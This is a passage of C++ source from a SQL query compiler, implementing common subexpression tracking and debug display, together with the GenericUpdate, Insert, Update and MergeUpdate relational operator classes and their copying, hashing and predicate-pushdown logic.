Int32 result = 0; NABoolean sharedConsumers = FALSE; LIST(CountedCSEInfo) countsByCSE(CmpCommon::statementHeap()); CollIndex minc = 0; CollIndex maxc = consumers_.entries(); if (restrictToSingleConsumer >= 0) { // count only the executions resulting from a single consumer minc = restrictToSingleConsumer; maxc = minc + 1; } // loop over all consumers or look at just one for (CollIndex c=minc; c<maxc; c++) { if (isShared(c)) { sharedConsumers = TRUE; } else { CommonSubExprRef *consumer = getConsumer(c); CSEInfo *parentInfo = CmpCommon::statement()->getCSEInfoById( consumer->getParentCSEId()); NABoolean duplicateDueToSharedConsumer = FALSE; // Don't double-count consumers that originate from the // same parent CSE, have the same lexical ref number from // the parent, and are shared. if (parentInfo->isShared( consumer->getParentConsumerId())) { for (CollIndex d=0; d<countsByCSE.entries(); d++) if (countsByCSE[d].getInfo() == parentInfo && countsByCSE[d].getLexicalCount() == consumer->getLexicalRefNumFromParent()) { duplicateDueToSharedConsumer = TRUE; break; } // First consumer from this parent CSE with this lexical // ref number, remember that we are going to count // it. Note that we are use the lexical ref "count" in // CountedCSEInfo as the lexical ref number in this // method, so the name "count" means "ref number" in // this context. 
if (!duplicateDueToSharedConsumer) countsByCSE.insert( CountedCSEInfo( parentInfo, consumer->getLexicalRefNumFromParent())); } // parent consumer is shared if (!duplicateDueToSharedConsumer) { // recursively determine number of times the parent of // this consumer gets executed result += parentInfo->getTotalNumRefs( consumer->getParentConsumerId()); } } // consumer is not shared } // loop over consumer(s) if (sharedConsumers) // all the shared consumers are handled by evaluating the CSE once result++; return result; } CSEInfo::CSEAnalysisOutcome CSEInfo::getAnalysisOutcome(Int32 id) const { if (idOfAnalyzingConsumer_ != id && analysisOutcome_ == CREATE_TEMP) // only the analyzing consumer creates and reads the temp, the // others only read it return TEMP; else return analysisOutcome_; } Int32 CSEInfo::addChildCSE(CSEInfo *childInfo, NABoolean addLexicalRef) { Int32 result = -1; CollIndex foundIndex = NULL_COLL_INDEX; // look for an existing entry for (CollIndex i=0; i<childCSEs_.entries() && foundIndex == NULL_COLL_INDEX; i++) if (childCSEs_[i].getInfo() == childInfo) foundIndex = i; if (foundIndex == NULL_COLL_INDEX) { // create a new entry foundIndex = childCSEs_.entries(); childCSEs_.insert(CountedCSEInfo(childInfo)); } if (addLexicalRef) { // The return value for a lexical ref is the count of lexical // refs for this particular parent/child CSE relationship so far // (0 if this is the first one). Note that we can't say anything // abount counts for expanded refs at this time, those will be // handled later, during the transform phase of the normalizer. 
result = childCSEs_[foundIndex].getLexicalCount(); childCSEs_[foundIndex].incrementLexicalCount(); } return result; } void CSEInfo::addCSERef(CommonSubExprRef *cse) { CMPASSERT(name_ == cse->getName()); cse->setId(consumers_.entries()); consumers_.insert(cse); if (cse->isALexicalRef()) numLexicalRefs_++; } void CSEInfo::replaceConsumerWithAnAlternative(CommonSubExprRef *c) { Int32 idToReplace = c->getId(); if (consumers_[idToReplace] != c) { CollIndex foundPos = alternativeConsumers_.index(c); CMPASSERT(foundPos != NULL_COLL_INDEX); CMPASSERT(consumers_[idToReplace]->getOriginalRef() == c->getOriginalRef()); // c moves from the list of copies to the real list and another // consumer moves the opposite way alternativeConsumers_.removeAt(foundPos); alternativeConsumers_.insert(consumers_[idToReplace]); consumers_[idToReplace] = c; } } // ----------------------------------------------------------------------- // member functions for class CommonSubExprRef // ----------------------------------------------------------------------- NABoolean CommonSubExprRef::isAChildOfTheMainQuery() const { return (parentCSEId_ == CmpStatement::getCSEIdForMainQuery()); } CommonSubExprRef::~CommonSubExprRef() { } Int32 CommonSubExprRef::getArity() const { // always return 1 for now, that may change in the future return 1; } void CommonSubExprRef::addToCmpStatement(NABoolean lexicalRef) { NABoolean alreadySeen = TRUE; // look up whether a CSE with this name already exists CSEInfo *info = CmpCommon::statement()->getCSEInfo(internalName_); // sanity check, make sure that the caller knows whether this is a // lexical ref (generated with CommonSubExprRef constructor) or an // expanded ref (generated with CommonSubExprRef::copyTopNode() // before the bind phase) CMPASSERT(isALexicalRef() == lexicalRef); if (!info) { // make a new object to hold a list of all references // to this CSE (the first one of them will be "this") info = new(CmpCommon::statementHeap()) CSEInfo(internalName_, 
CmpCommon::statementHeap()); alreadySeen = FALSE; } info->addCSERef(this); if (!alreadySeen) CmpCommon::statement()->addCSEInfo(info); } void CommonSubExprRef::addParentRef(CommonSubExprRef *parentRef) { // Establish the parent/child relationship between two // CommonSubExprRef nodes, or between the main query and a // CommonSubExprRef node (parentRef == NULL). Also, record // the dependency between parent and child CSEs in the lexical // dependency multigraph. Bookkeeping to do: // // - Add the child's CSE to the list of child CSEs of the // parent CSE // - Set the data members in the child ref that point to the // parent CSE and parent ref // parent info is for a parent CSE or for the main query CSEInfo *parentInfo = (parentRef ? CmpCommon::statement()->getCSEInfo(parentRef->getName()) : CmpCommon::statement()->getCSEInfoForMainQuery()); CSEInfo *childInfo = CmpCommon::statement()->getCSEInfo(getName()); CMPASSERT(parentInfo && childInfo); // Update the lexical CSE multigraph, and also return the // count of previously existing edges in the graph. // LexicalRefNumFromParent is set to a positive value only for // lexical refs, the other refs will be handled later, in the SQO // phase. This is since expanded refs may be processed before their // lexical ref and we may not know this value yet. 
lexicalRefNumFromParent_ = parentInfo->addChildCSE(childInfo, isALexicalRef()); parentCSEId_ = parentInfo->getCSEId(); if (parentRef) parentRefId_ = parentRef->getId(); else parentRefId_ = -1; // main query does not have a CommonSubExprRef } NABoolean CommonSubExprRef::isFirstReference() const { return (CmpCommon::statement()->getCSEInfo(internalName_) == NULL); } void CommonSubExprRef::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (NOT columnList_.isEmpty()) { xlist.insert(columnList_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("column_list"); } if(NOT pushedPredicates_.isEmpty()) { xlist.insert(pushedPredicates_.rebuildExprTree()); llist.insert("pushed_predicates"); } } HashValue CommonSubExprRef::topHash() { HashValue result = RelExpr::topHash(); result ^= internalName_; result ^= id_; result ^= columnList_; result ^= pushedPredicates_; return result; } NABoolean CommonSubExprRef::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; const CommonSubExprRef &o = static_cast<const CommonSubExprRef &>(other); return (internalName_ == o.internalName_ && id_ == o.id_ && columnList_ == o.columnList_ && pushedPredicates_ == o.pushedPredicates_); } RelExpr * CommonSubExprRef::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { CommonSubExprRef *result = NULL; if (derivedNode == NULL) result = new (outHeap) CommonSubExprRef(NULL, internalName_.data(), outHeap); else result = static_cast<CommonSubExprRef *>(derivedNode); // copy fields that are common for bound and unbound nodes result->hbAccessOptionsFromCTE_ = hbAccessOptionsFromCTE_; if (nodeIsBound()) { // if the node is bound, we assume that the copy is serving the same function // as the original, as an alternative, create an "alternative ref" result->setId(id_); result->parentCSEId_ = parentCSEId_; result->parentRefId_ = parentRefId_; result->lexicalRefNumFromParent_ = lexicalRefNumFromParent_; result->columnList_ = columnList_; 
result->nonVEGColumns_ = nonVEGColumns_; result->commonInputs_ = commonInputs_; result->pushedPredicates_ = pushedPredicates_; result->nonSharedPredicates_ = nonSharedPredicates_; result->cseEstLogProps_ = cseEstLogProps_; // don't copy the tempScan_ // Mark this as an alternative ref, not that this does not // change the status of lexical vs. expanded ref result->isAnExpansionOf_ = isAnExpansionOf_; result->isAnAlternativeOf_ = ( isAnAlternativeOf_ ? isAnAlternativeOf_ : this); CmpCommon::statement()->getCSEInfo(internalName_)-> registerAnAlternativeConsumer(result); } else { // If the node is not bound, we assume that we created an // "expanded" reference to a common subexpression in a tree that // itself is a reference to a CTE (Common Table Expression). // See the comment in RelMisc.h for method isAnExpandedRef() // to explain the term "expanded" ref. result->isAnExpansionOf_ = (isAnExpansionOf_ ? isAnExpansionOf_ : this); result->addToCmpStatement(FALSE); } return result; } const NAString CommonSubExprRef::getText() const { NAString result("cse "); char buf[20]; result += ToAnsiIdentifier(internalName_); snprintf(buf, sizeof(buf), " %d", id_); result += buf; return result; } Union * CommonSubExprRef::makeUnion(RelExpr *lc, RelExpr *rc, NABoolean blocked) { // Make a regular or blocked union with no characteristic outputs Union *result; ValueIdSet newInputs(lc->getGroupAttr()->getCharacteristicInputs()); result = new(CmpCommon::statementHeap()) Union(lc, rc); newInputs += rc->getGroupAttr()->getCharacteristicInputs(); result->setGroupAttr(new (CmpCommon::statementHeap()) GroupAttributes()); result->getGroupAttr()->addCharacteristicInputs(newInputs); if(blocked) result->setBlockedUnion(); return result; } void CommonSubExprRef::display() { if (isAChildOfTheMainQuery()) printf("Parent: main query, lexical ref %d\n", lexicalRefNumFromParent_); else printf("Parent: %s(consumer %d, lexical ref %d)\n", CmpCommon::statement()->getCSEInfoById( 
parentCSEId_)->getName().data(), parentRefId_, lexicalRefNumFromParent_); printf("Original columns:\n"); columnList_.display(); printf("\nCommon inputs:\n"); commonInputs_.display(); printf("\nPushed predicates:\n"); pushedPredicates_.display(); printf("\nNon shared preds to be applied to scan:\n"); nonSharedPredicates_.display(); printf("\nPotential values for VEG rewrite:\n"); nonVEGColumns_.display(); } void CommonSubExprRef::displayAll(const char *optionalId) { const LIST(CSEInfo *) *cses = CmpCommon::statement()->getCSEInfoList(); if (cses) for (CollIndex i=0; i<cses->entries(); i++) if (!optionalId || strlen(optionalId) == 0 || cses->at(i)->getName() == optionalId) { CSEInfo *info = cses->at(i); CollIndex nc = info->getNumConsumers(); NABoolean isMainQuery = (info->getCSEId() == CmpStatement::getCSEIdForMainQuery()); if (isMainQuery) { printf("\n\n==========================\n"); printf("MainQuery:\n"); } else { printf("\n\n==========================\n"); printf("CSE: %s (%d consumers, %d lexical ref(s), %d total execution(s))\n", info->getName().data(), nc, info->getNumLexicalRefs(), info->getTotalNumRefs()); } const LIST(CountedCSEInfo) &children(info->getChildCSEs()); for (CollIndex j=0; j<children.entries(); j++) printf(" references CSE: %s %d times\n", children[j].getInfo()->getName().data(), children[j].getLexicalCount()); if (info->getIdOfAnalyzingConsumer() >= 0) { const char *outcome = "?"; ValueIdList cols; CommonSubExprRef *consumer = info->getConsumer(info->getIdOfAnalyzingConsumer()); const ValueIdList &cCols(consumer->getColumnList()); switch (info->getAnalysisOutcome(0)) { case CSEInfo::UNKNOWN_ANALYSIS: outcome = "UNKNOWN"; break; case CSEInfo::EXPAND: outcome = "EXPAND"; break; case CSEInfo::CREATE_TEMP: outcome = "CREATE_TEMP"; break; case CSEInfo::TEMP: outcome = "TEMP"; break; case CSEInfo::ERROR: outcome = "ERROR"; break; default: outcome = "???"; break; } printf(" analyzed by consumer %d, outcome: %s\n", info->getIdOfAnalyzingConsumer(), 
outcome); makeValueIdListFromBitVector( cols, cCols, info->getNeededColumns()); printf("\n columns of temp table:\n"); cols.display(); printf("\n commonPredicates:\n"); info->getCommonPredicates().display(); if (info->getVEGRefsWithDifferingConstants().entries() > 0) { printf("\n vegRefsWithDifferingConstants:\n"); info->getVEGRefsWithDifferingConstants().display(); } if (info->getVEGRefsWithDifferingInputs().entries() > 0) { printf("\n vegRefsWithDifferingInputs:\n"); info->getVEGRefsWithDifferingInputs().display(); } if (info->getCSETreeKeyColumns().entries() > 0) { ValueIdList keyCols; makeValueIdListFromBitVector( keyCols, cCols, info->getCSETreeKeyColumns()); printf("\n CSE key columns:\n"); keyCols.display(); } printf("\n DDL of temp table:\n%s\n", info->getTempTableDDL().data()); } // analyzed else if (info->getAnalysisOutcome(0) == CSEInfo::ELIMINATED_IN_BINDER) printf(" eliminated in the binder\n"); else if (!isMainQuery) printf(" not yet analyzed\n"); for (int c=0; c<nc; c++) { printf("\n\n----- Consumer %d:\n", c); info->getConsumer(c)->display(); } } // a CSE we want to display } void CommonSubExprRef::makeValueIdListFromBitVector(ValueIdList &tgt, const ValueIdList &src, const NABitVector &vec) { for (CollIndex b=0; vec.nextUsed(b); b++) tgt.insert(src[b]); } // ----------------------------------------------------------------------- // member functions for class GenericUpdate // ----------------------------------------------------------------------- GenericUpdate::~GenericUpdate() {} Int32 GenericUpdate::getArity() const { if (getOperator().match(REL_ANY_LEAF_GEN_UPDATE)) return 0; else if (getOperator().match(REL_ANY_UNARY_GEN_UPDATE)) return 1; else ABORT("Don't know opcode in GenericUpdate::getArity()"); return 0; // return makes MSVC happy. 
} void GenericUpdate::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues = potentialOutputs_; if (producedMergeIUDIndicator_ != NULL_VALUE_ID) outputValues += producedMergeIUDIndicator_; } const NAString GenericUpdate::getUpdTableNameText() const { return updatedTableName_.getTextWithSpecialType(); } void GenericUpdate::computeUsedCols() { ValueIdSet requiredValueIds(newRecExpr_); ValueIdSet coveredExprs; // --------------------------------------------------------------------- // Call the "coverTest" method, offering it all the index columns // as additional inputs. "coverTest" will mark those index columns that // it actually needs to satisfy the required value ids, and that is // what we actually want. The actual cover test should always succeed, // otherwise the update node would have been inconsistent. // --------------------------------------------------------------------- // use the clustering index, unless set otherwise if (indexDesc_ == NULL) indexDesc_ = getTableDesc()->getClusteringIndex(); if (isMerge()) { requiredValueIds.insertList(mergeInsertRecExpr_); } requiredValueIds.insertList(beginKeyPred_); requiredValueIds.insertList(endKeyPred_); requiredValueIds.insertList(getCheckConstraints()); // QSTUFF requiredValueIds.insertList(newRecBeforeExpr_); // QSTUFF getGroupAttr()->coverTest(requiredValueIds, indexDesc_->getIndexColumns(), // all index columns coveredExprs, // dummy parameter usedColumns_); // needed index cols // usedColumns_ is now set correctly } // GenericUpdate::computeUsedCols const NAString GenericUpdate::getText() const { return ("GenericUpdate " + getUpdTableNameText()); } HashValue GenericUpdate::topHash() { HashValue result = RelExpr::topHash(); result ^= newRecExpr_; if (isMerge()) result ^= mergeInsertRecExpr_; // result ^= keyExpr_; return result; } NABoolean GenericUpdate::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; GenericUpdate &o = (GenericUpdate &) 
other; if (newRecExpr_ != o.newRecExpr_ OR (isMerge() && ((mergeInsertRecExpr_ != o.mergeInsertRecExpr_) OR (mergeUpdatePred_ != o.mergeUpdatePred_)) ) OR NOT (beginKeyPred_ == o.beginKeyPred_) OR NOT (endKeyPred_ == o.endKeyPred_)) return FALSE; // later, replace this with the getTableDesc() ??? if (NOT (updatedTableName_ == o.updatedTableName_)) return FALSE; if (mtsStatement_ != o.mtsStatement_) return FALSE; if (noRollback_ != o.noRollback_) return FALSE; if (avoidHalloweenR2_ != o.avoidHalloweenR2_) return FALSE; if (avoidHalloween_ != o.avoidHalloween_) return FALSE; if (halloweenCannotUseDP2Locks_ != o.halloweenCannotUseDP2Locks_) return FALSE; return TRUE; } RelExpr * GenericUpdate::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { GenericUpdate *result; if (derivedNode == NULL) result = new (outHeap) GenericUpdate(updatedTableName_, getTableDesc(), getOperatorType(), NULL, NULL, NULL, outHeap); else result = (GenericUpdate *) derivedNode; result->setIndexDesc((IndexDesc *)getIndexDesc()); if (newRecExprTree_) result->newRecExprTree_ = newRecExprTree_->copyTree(outHeap)->castToItemExpr(); // ## Should usedColumns_ be copied here? Is it missing deliberately or only by mistake? 
result->updateToSelectMap_ = updateToSelectMap_; result->newRecExpr_ = newRecExpr_; result->newRecExprArray_ = newRecExprArray_; // QSTUFF result->newRecBeforeExpr_ = newRecBeforeExpr_; result->newRecBeforeExprArray_ = newRecBeforeExprArray_; // QSTUFF result->mergeInsertRecExpr_ = mergeInsertRecExpr_; result->mergeInsertRecExprArray_ = mergeInsertRecExprArray_; result->mergeUpdatePred_ = mergeUpdatePred_; result->beginKeyPred_ = beginKeyPred_; result->endKeyPred_ = endKeyPred_; result->executorPred_ = executorPred_; result->potentialOutputs_ = potentialOutputs_; result->indexNewRecExprArrays_ = indexNewRecExprArrays_; result->indexBeginKeyPredArray_ = indexBeginKeyPredArray_; result->indexEndKeyPredArray_ = indexEndKeyPredArray_; result->indexNumberArray_ = indexNumberArray_; result->scanIndexDesc_ = scanIndexDesc_; result->accessOptions_ = accessOptions_; result->checkConstraints_ = checkConstraints_; result->rowsAffected_ = rowsAffected_; result->setOptStoi(stoi_); result->setNoFlow(noFlow_); result->setMtsStatement(mtsStatement_); result->setNoRollbackOperation(noRollback_); result->setAvoidHalloweenR2(avoidHalloweenR2_); result->avoidHalloween_ = avoidHalloween_; result->halloweenCannotUseDP2Locks_ = halloweenCannotUseDP2Locks_; result->setIsMergeUpdate(isMergeUpdate_); result->setIsMergeDelete(isMergeDelete_); result->subqInUpdateAssign_ = subqInUpdateAssign_; result->setUpdateCKorUniqueIndexKey(updateCKorUniqueIndexKey_); result->hbaseOper() = hbaseOper(); result->uniqueHbaseOper() = uniqueHbaseOper(); result->cursorHbaseOper() = cursorHbaseOper(); result->uniqueRowsetHbaseOper() = uniqueRowsetHbaseOper(); result->canDoCheckAndUpdel() = canDoCheckAndUpdel(); result->setNoCheck(noCheck()); result->noDTMxn() = noDTMxn(); result->useMVCC() = useMVCC(); result->useSSCC() = useSSCC(); if (currOfCursorName()) result->currOfCursorName_ = currOfCursorName()->copyTree(outHeap)->castToItemExpr(); if (preconditionTree_) result->preconditionTree_ = 
preconditionTree_->copyTree(outHeap)->castToItemExpr(); result->setPrecondition(precondition_); result->exprsInDerivedClasses_ = exprsInDerivedClasses_; result->producedMergeIUDIndicator_ = producedMergeIUDIndicator_; result->referencedMergeIUDIndicator_ = referencedMergeIUDIndicator_; return RelExpr::copyTopNode(result, outHeap); } PlanPriority GenericUpdate::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { PlanPriority result; NABoolean interactiveAccess = (CmpCommon::getDefault(INTERACTIVE_ACCESS) == DF_ON) OR ( QueryAnalysis::Instance() AND QueryAnalysis::Instance()->optimizeForFirstNRows()); return result; } void GenericUpdate::addNewRecExprTree(ItemExpr *expr) { ExprValueId newRec = newRecExprTree_; ItemExprTreeAsList(&newRec, ITM_AND).insert(expr); newRecExprTree_ = newRec.getPtr(); } ItemExpr * GenericUpdate::removeNewRecExprTree() { ItemExpr * result = newRecExprTree_; newRecExprTree_ = NULL; return result; } void GenericUpdate::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (newRecExprTree_ != NULL OR NOT newRecExpr_.isEmpty()) { if (newRecExpr_.isEmpty()) xlist.insert(newRecExprTree_); else xlist.insert(newRecExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("new_rec_expr"); } if ((isMerge()) && (NOT mergeInsertRecExpr_.isEmpty())) { xlist.insert(mergeInsertRecExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("merge_insert_rec_expr"); } if ((isMerge()) && (NOT mergeUpdatePred_.isEmpty())) { xlist.insert(mergeUpdatePred_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("merge_update_where_pred"); } Int32 indexNo = 0; for(; indexNo < (Int32)indexNewRecExprArrays_.entries(); indexNo++) { ValueIdArray array = indexNewRecExprArrays_[indexNo]; ValueIdList list; for(Int32 i = 0; i < (Int32)array.entries(); i++) list.insert(array[i]); xlist.insert(list.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("new idx rec expr"); } if (executorPredTree_ != NULL OR NOT executorPred_.isEmpty()) { if 
(executorPred_.isEmpty()) xlist.insert(executorPredTree_); else xlist.insert(executorPred_.rebuildExprTree()); llist.insert("predicate"); } // display preds from search key only if begin/end keys are // not generated yet (e.g. during optimization) if (beginKeyPred_.isEmpty() AND endKeyPred_.isEmpty() AND pathKeys_ AND NOT pathKeys_->getKeyPredicates().isEmpty()) { xlist.insert(pathKeys_->getKeyPredicates().rebuildExprTree()); if (pathKeys_ == partKeys_) llist.insert("key_and_part_key_preds"); else llist.insert("key_predicates"); } // display part key preds only if different from clustering key preds if (partKeys_ AND pathKeys_ != partKeys_ AND NOT partKeys_->getKeyPredicates().isEmpty()) { xlist.insert(partKeys_->getKeyPredicates().rebuildExprTree()); llist.insert("part_key_predicates"); } if (NOT beginKeyPred_.isEmpty()) { xlist.insert(beginKeyPred_.rebuildExprTree(ITM_AND)); llist.insert("begin_key"); } for(indexNo = 0; indexNo < (Int32)indexBeginKeyPredArray_.entries(); indexNo++){ if(NOT indexBeginKeyPredArray_[indexNo].isEmpty()) { xlist.insert(indexBeginKeyPredArray_[indexNo] .rebuildExprTree(ITM_ITEM_LIST)); llist.insert("index_begin_key"); } } if (NOT endKeyPred_.isEmpty()) { xlist.insert(endKeyPred_.rebuildExprTree(ITM_AND)); llist.insert("end_key"); } for(indexNo = 0; indexNo < (Int32)indexEndKeyPredArray_.entries(); indexNo++) { if(NOT indexEndKeyPredArray_[indexNo].isEmpty()) { xlist.insert(indexEndKeyPredArray_[indexNo] .rebuildExprTree(ITM_ITEM_LIST)); llist.insert("index_end_key"); } } if (NOT getCheckConstraints().isEmpty()) { xlist.insert(getCheckConstraints().rebuildExprTree(ITM_AND)); llist.insert("check_constraint"); } if (preconditionTree_ != NULL OR precondition_.entries() > 0) { if (preconditionTree_ != NULL) xlist.insert(preconditionTree_); else xlist.insert(precondition_.rebuildExprTree(ITM_AND)); llist.insert("precondition"); } RelExpr::addLocalExpr(xlist,llist); } NABoolean GenericUpdate::updateCurrentOf() { return currOfCursorName() != 
NULL #ifndef NDEBUG || getenv("FORCE_UPD_CURR_OF") #endif ; } //++MV - returns the GenericUpdateOutputFunction's that are in the // potential outputs NABoolean GenericUpdate::getOutputFunctionsForMV(ValueId &valueId, OperatorTypeEnum opType) const { const ValueIdSet& outputs = getGroupAttr()->getCharacteristicOutputs(); for (ValueId vid= outputs.init(); outputs.next(vid); outputs.advance(vid) ) { ItemExpr *expr = vid.getItemExpr(); if (expr->getOperatorType() == ITM_CAST) expr = expr->child(0); if (expr->getOperator().match(opType) && expr->isAGenericUpdateOutputFunction() ) { valueId = vid; return TRUE; } } return FALSE; } NABoolean GenericUpdate::computeRowsAffected() const { if (rowsAffected_ == GenericUpdate::COMPUTE_ROWSAFFECTED) return TRUE; else return FALSE; }; void GenericUpdate::configTSJforHalloween( Join* tsj, OperatorTypeEnum opType, CostScalar inputCardinality) { if (avoidHalloween()) { // If we use DP2's FELOCKSELF (i.e., DP2Locks) method to // protect against Halloween, then lock escalation will // be disabled in the Generator. So DP2 wants us to use // no more than 25000 locks per volume. // Also, notice that // by design, we are relying on good cardinality estimates. // If the estimates are too low, then there may be // runtime errors. const PartitioningFunction *partFunc = getTableDesc()-> getClusteringIndex()->getPartitioningFunction(); const Lng32 numParts = partFunc ? partFunc->getCountOfPartitions() : 1; const Lng32 maxLocksAllParts = 25000 * numParts; if ((opType == REL_LEAF_INSERT) && (inputCardinality < maxLocksAllParts) && ! 
getHalloweenCannotUseDP2Locks() && (CmpCommon::getDefault(BLOCK_TO_PREVENT_HALLOWEEN) != DF_ON) ) tsj->setHalloweenForceSort(Join::NOT_FORCED); else tsj->setHalloweenForceSort(Join::FORCED); } } void GenericUpdate::pushdownCoveredExpr(const ValueIdSet &outputExpr, const ValueIdSet &newExternalInputs, ValueIdSet &predicatesOnParent, const ValueIdSet *setOfValuesReqdByParent, Lng32 childIndex ) { // --------------------------------------------------------------------- // determine the set of local expressions that need to be evaluated // - assign expressions (reference source & target cols) // - source cols alone (in case order is required) // - characteristic outputs for this node // --------------------------------------------------------------------- // QSTUFF ?? again need to understand details ValueIdSet localExprs(newRecExpr()); if (setOfValuesReqdByParent) localExprs += *setOfValuesReqdByParent; // QSTUFF localExprs.insertList(newRecBeforeExpr()); // QSTUFF if (isMerge()) { localExprs.insertList(mergeInsertRecExpr()); } localExprs.insertList(beginKeyPred()); localExprs.insertList(updateToSelectMap().getBottomValues()); if (setOfValuesReqdByParent) localExprs += *setOfValuesReqdByParent ; localExprs += exprsInDerivedClasses_; // --------------------------------------------------------------------- // Check which expressions can be evaluated by my child. // Modify the Group Attributes of those children who inherit some of // these expressions. // Since an GenericUpdate has no predicates, supply an empty set. 
// --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr( outputExpr, newExternalInputs, predicatesOnParent, &localExprs); } /* NABoolean Insert::reconcileGroupAttr(GroupAttributes *newGroupAttr) { SET(IndexDesc *) x; const IndexDesc* y = getTableDesc()->getClusteringIndex(); x.insert((IndexDesc*)y); newGroupAttr->addToAvailableBtreeIndexes(x); // Now as usual return RelExpr::reconcileGroupAttr(newGroupAttr); } */ // ----------------------------------------------------------------------- // member functions for class Insert // ----------------------------------------------------------------------- Insert::Insert(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child , ItemExpr *insertCols , ItemExpr *orderBy , CollHeap *oHeap , InsertType insertType, NABoolean createUstatSample) : GenericUpdate(name,tabId,otype,child,NULL,NULL,oHeap), insertColTree_(insertCols), orderByTree_(orderBy), targetUserColPosList_(NULL), bufferedInsertsAllowed_(FALSE), insertType_(insertType), noBeginSTInsert_(FALSE), noCommitSTInsert_(FALSE), enableTransformToSTI_(FALSE), enableAqrWnrEmpty_(FALSE), systemGeneratesIdentityValue_(FALSE), insertSelectQuery_(FALSE), boundView_(NULL), overwriteHiveTable_(FALSE), isSequenceFile_(FALSE), isUpsert_(FALSE), isTrafLoadPrep_(FALSE), createUstatSample_(createUstatSample), xformedEffUpsert_(FALSE), baseColRefs_(NULL) { insert_a_tuple_ = FALSE; if ( child ) { if ( child->getOperatorType() == REL_TUPLE ) { insert_a_tuple_ = TRUE; if (!name.isLocationNameSpecified()) { setCacheableNode(CmpMain::PARSE); } } else if ( child->getOperatorType() == REL_TUPLE_LIST && !name.isLocationNameSpecified() ) { setCacheableNode(CmpMain::PARSE); } } else // this is a patch to pass regression for maximum parallelism project, // if we insert a default values not a real tuple the child is NULL // but we'd like to identify is as a tuple insert. 
March,2006 if (CmpCommon::getDefault(COMP_BOOL_66) == DF_OFF) { insert_a_tuple_ = TRUE; } } Insert::~Insert() {} void Insert::addInsertColTree(ItemExpr *expr) { ExprValueId newCol = insertColTree_; ItemExprTreeAsList(&newCol, ITM_AND).insert(expr); insertColTree_ = newCol.getPtr(); } ItemExpr * Insert::removeInsertColTree() { ItemExpr * result = insertColTree_; insertColTree_ = NULL; return result; } ItemExpr * Insert::getInsertColTree() { return insertColTree_; } const NAString Insert::getText() const { NAString text("insert",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * Insert::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Insert *result; if (derivedNode == NULL) result = new (outHeap) Insert(getTableName(), getTableDesc(), getOperatorType(), NULL, NULL, NULL, outHeap, getInsertType()); else result = (Insert *) derivedNode; result->rrKeyExpr() = rrKeyExpr(); result->partNumInput() = partNumInput(); result->rowPosInput() = rowPosInput(); result->totalNumPartsInput() = totalNumPartsInput(); result->reqdOrder() = reqdOrder(); result->noBeginSTInsert_ = noBeginSTInsert_; result->noCommitSTInsert_ = noCommitSTInsert_; result->enableTransformToSTI() = enableTransformToSTI(); result->enableAqrWnrEmpty() = enableAqrWnrEmpty(); if (insertColTree_ != NULL) result->insertColTree_ = insertColTree_->copyTree(outHeap)->castToItemExpr(); result->insertATuple() = insertATuple(); result->setInsertSelectQuery(isInsertSelectQuery()); result->setOverwriteHiveTable(getOverwriteHiveTable()); result->setSequenceFile(isSequenceFile()); result->isUpsert_ = isUpsert_; result->isTrafLoadPrep_ = isTrafLoadPrep_; result->createUstatSample_ = createUstatSample_; result->xformedEffUpsert_ = xformedEffUpsert_; return GenericUpdate::copyTopNode(result, outHeap); } void Insert::setNoBeginCommitSTInsert(NABoolean noBeginSTI, NABoolean noCommitSTI) { noBeginSTInsert_ = noBeginSTI; noCommitSTInsert_ = noCommitSTI; } // 
----------------------------------------------------------------------- // member functions for class Update // ----------------------------------------------------------------------- Update::Update(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child, ItemExpr *newRecExpr, ItemExpr *currOfCursorName, CollHeap *oHeap) : GenericUpdate(name,tabId,otype,child,newRecExpr,currOfCursorName,oHeap), estRowsAccessed_(0) { setCacheableNode(CmpMain::BIND); } Update::~Update() {} const NAString Update::getText() const { NAString text("update",CmpCommon::statementHeap()); return (text + " " + getUpdTableNameText()); } RelExpr * Update::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Update *result; if (derivedNode == NULL) result = new (outHeap) Update(getTableName(), getTableDesc(), getOperatorType(), NULL, NULL, NULL, outHeap); else result = (Update *) derivedNode; result->setEstRowsAccessed(getEstRowsAccessed()); return GenericUpdate::copyTopNode(result, outHeap); } // ----------------------------------------------------------------------- // member functions for class MergeUpdate // ----------------------------------------------------------------------- MergeUpdate::MergeUpdate(const CorrName &name, TableDesc *tabId, OperatorTypeEnum otype, RelExpr *child, ItemExpr *setExpr, ItemExpr *insertCols, ItemExpr *insertValues, CollHeap *oHeap, ItemExpr *where) : Update(name,tabId,otype,child,setExpr,NULL,oHeap), insertCols_(insertCols), insertValues_(insertValues), where_(where), xformedUpsert_(FALSE), needsBindScope_(TRUE) { setCacheableNode(CmpMain::BIND); setIsMergeUpdate(TRUE); // if there is a WHERE NOT MATCHED INSERT action, then the scan // has to take place in the merge node at run time, so we have // to suppress the TSJ transformation on this node if (insertValues) setNoFlow(TRUE); } MergeUpdate::~MergeUpdate() {} const NAString MergeUpdate::getText() const { NAString text("merge_update",CmpCommon::statementHeap()); return (text + " " + 
